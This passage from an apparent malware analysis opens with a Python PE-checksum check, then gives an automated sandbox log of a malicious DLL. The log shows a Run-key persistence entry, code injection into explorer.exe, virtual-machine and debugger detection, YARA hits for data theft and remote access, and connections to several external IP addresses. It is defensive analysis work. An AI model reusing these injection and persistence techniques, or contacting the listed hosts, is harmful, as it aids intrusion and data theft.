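    struct.pack_into("<H", opt, 0, 0x20B)            # PE32+ magic
    struct.pack_into("<Q", opt, 24, 0x180000000)     # ImageBase, same value the report shows
    struct.pack_into("<I", opt, 0x40, stored_checksum)
    return bytes(dos) + coff + bytes(opt) + payload


if __name__ == "__main__":
    img = build_minimal_pe(0, b"constructed-payload")
    stored, computed, ok = verify(img)
    print(f"real checksum: {stored:#x} should be: {computed:#x} ({'ok' if ok else 'mismatch'})")
    fixed = build_minimal_pe(computed, b"constructed-payload")
    print("after writing the computed value:", verify(fixed))
```

Two properties make this usable as a check rather than a curiosity: the CheckSum dword is excluded from its own sum, so writing the computed value back and recomputing returns the same number, and any single-byte change elsewhere in the file changes the result. Treat the mismatch as a weak signal on its own: Windows enforces the checksum only for kernel-mode drivers and boot-time images, and plenty of legitimate user-mode binaries ship with a zero or stale field. Here it is one more datum alongside the odd "hVr" section name and the eppcom64.dll PDB path reused by an unrelated loader.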
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\upfilles.dll.dll
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180006138 push E8000020h; iretd 6_2_000000018000613D
Source: C:\Windows\System32\rundll32.exe Code function: 18_2_00000292116A5BB0 push r15; ret 18_2_00000292116A5BB5
Source: C:\Windows\System32\rundll32.exe Code function: 18_2_000000026E7A31B0 push r15; ret 18_2_000000026E7A31B5
Source: C:\Windows\System32\rundll32.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Jump to behavior
Source: C:\Windows\System32\rundll32.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Jump to behavior
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180023584 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 6_2_0000000180023584
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior (13 identical entries)
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior (20 identical entries)
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior (183 identical entries)
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Code function: GetAdaptersInfo,GetAdaptersInfo, 22_2_013A5904
Source: C:\Windows\explorer.exe Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA, 22_2_013A6984
Source: C:\Windows\explorer.exe Code function: GetAdaptersInfo, 22_2_013ADDF8
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 5001
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 4879
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 468
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 8936
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 694
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 672
Source: C:\Windows\System32\rundll32.exe API coverage: 2.5 %
Source: C:\Windows\System32\loaddll64.exe TID: 6660 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 7324 Thread sleep count: 5001 > 30
Source: C:\Windows\System32\rundll32.exe TID: 7324 Thread sleep time: -300060000s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 7324 Thread sleep count: 4879 > 30
Source: C:\Windows\System32\rundll32.exe TID: 7324 Thread sleep time: -292740000s >= -30000s
Source: C:\Windows\explorer.exe TID: 7704 Thread sleep time: -224000s >= -30000s
Source: C:\Windows\explorer.exe TID: 7728 Thread sleep time: -46800s >= -30000s
Source: C:\Windows\explorer.exe TID: 7704 Thread sleep time: -8936000s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000001800192B8 FindFirstFileExW, 6_2_00000001800192B8
Source: C:\Windows\explorer.exe Code function: 22_2_013A8BA8 FindFirstFileW,FindNextFileW,LoadLibraryW, 22_2_013A8BA8
Source: C:\Windows\explorer.exe Code function: 22_2_013A1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 22_2_013A1A08
Source: C:\Windows\explorer.exe Code function: 22_2_013ADCE0 FindFirstFileW, 22_2_013ADCE0
Source: C:\Windows\System32\loaddll64.exe Thread delayed: delay time: 120000
Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 60000
Source: explorer.exe, 00000016.00000000.1849178409.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: Amcache.hve.9.dr Binary or memory string: VMware
Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual USB Mouse
Source: explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: Amcache.hve.9.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.9.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.9.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.9.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.9.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: rundll32.exe, 00000012.00000002.2938154508.0000029211558000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882651450.00000292115BC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.9.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: explorer.exe, 00000016.00000000.1849178409.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Amcache.hve.9.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.9.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: explorer.exe, 00000016.00000000.1847916203.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000016.00000002.2940539964.00000000078A0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: Amcache.hve.9.dr Binary or memory string: vmci.sys
Source: explorer.exe, 00000016.00000000.1849178409.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: Amcache.hve.9.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.9.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.9.dr Binary or memory string: \driver\vmci,\driver\pci
Source: explorer.exe, 00000016.00000000.1849178409.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTTAVMWare
Source: Amcache.hve.9.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: explorer.exe, 00000016.00000000.1847916203.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: Amcache.hve.9.dr Binary or memory string: VMware20,1
Source: Amcache.hve.9.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.9.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.9.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.9.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.9.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: explorer.exe, 00000016.00000002.2940539964.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007A34000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000016.00000002.2942821965.0000000009660000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.9.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\System32\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\explorer.exe API call chain: ExitProcess graph end node
Source: C:\Windows\explorer.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\rundll32.exe Process queried: DebugPort
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000001800118B8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00000001800118B8
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018000D1F4 GetLastError,IsDebuggerPresent,OutputDebugStringW, 6_2_000000018000D1F4
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001AC34 GetProcessHeap, 6_2_000000018001AC34
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018000E470 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_000000018000E470
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018000D638 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_000000018000D638

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\rundll32.exe Network Connect: 138.124.183.215 443
Source: C:\Windows\System32\rundll32.exe Network Connect: 3.69.236.35 443
Source: C:\Windows\System32\rundll32.exe Network Connect: 91.194.11.183 443
Source: C:\Windows\System32\rundll32.exe Network Connect: 54.175.181.104 443
Source: C:\Windows\System32\rundll32.exe Network Connect: 95.164.68.73 443
Source: C:\Windows\explorer.exe Network Connect: 104.21.16.155 443
Source: C:\Windows\System32\rundll32.exe Memory allocated: C:\Windows\explorer.exe base: 13A0000 protect: page execute and read and write
Source: C:\Windows\System32\rundll32.exe Code function: 18_3_00007DF4F0240100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread, 18_3_00007DF4F0240100
Source: C:\Windows\System32\rundll32.exe Code function: 18_2_000000026E7A1370 Sleep,SleepEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject, 18_2_000000026E7A1370
Source: C:\Windows\System32\rundll32.exe Thread created: C:\Windows\explorer.exe EIP: 13A0000
Source: C:\Windows\System32\rundll32.exe Memory written: C:\Windows\explorer.exe base: 13A0000 value starts with: 4D5A
Source: C:\Windows\System32\rundll32.exe Memory written: PID: 2580 base: 13A0000 value: 4D
Source: C:\Windows\System32\rundll32.exe Thread register set: target process: 6516
Source: C:\Windows\System32\rundll32.exe Thread register set: 6516 1
Source: C:\Windows\System32\rundll32.exe Memory written: C:\Windows\explorer.exe base: 13A0000
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
Source: explorer.exe, 00000016.00000002.2942821965.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940227099.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000016.00000000.1844891451.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.2938046859.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000016.00000002.2937197092.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1Progman$
Source: explorer.exe, 00000016.00000000.1844891451.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.2938046859.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000016.00000000.1844891451.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.2938046859.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000001800206B0 cpuid 6_2_00000001800206B0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018000E5BC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 6_2_000000018000E5BC
Source: C:\Windows\explorer.exe Code function: 22_2_013A7318 GetUserNameA,wsprintfA, 22_2_013A7318
Source: C:\Windows\explorer.exe Code function: 22_2_013ADB28 GetVersionExW, 22_2_013ADB28
Source: Amcache.hve.9.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.9.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.9.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: 18.2.rundll32.exe.29211650000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.292116a0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.292116a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000002.2938671459.0000029211650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2938735431.00000292116A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.1843049394.0000029213423000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.1843192476.0000029213423000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2738816096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.1842909028.0000029213422000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2311847302.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2284190577.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7320, type: MEMORYSTR
Source: Yara match File source: 18.3.rundll32.exe.7df4f0220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.explorer.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.3.rundll32.exe.7df4f0220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.explorer.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.explorer.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.explorer.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000016.00000003.2703639060.0000000003250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.1844669819.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.1867725723.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.1868887059.00000292135D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.1868680221.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2807505534.0000000008820000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.1867965215.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2945149697.000000000B52C000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.1867247710.00007DF4F0220000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2938259956.0000000003140000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.1868287262.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.1868470583.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 18.2.rundll32.exe.29211650000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.292116a0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.292116a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000002.2938671459.0000029211650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2938735431.00000292116A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.1843049394.0000029213423000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.1843192476.0000029213423000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2738816096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.1842909028.0000029213422000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2311847302.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2284190577.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
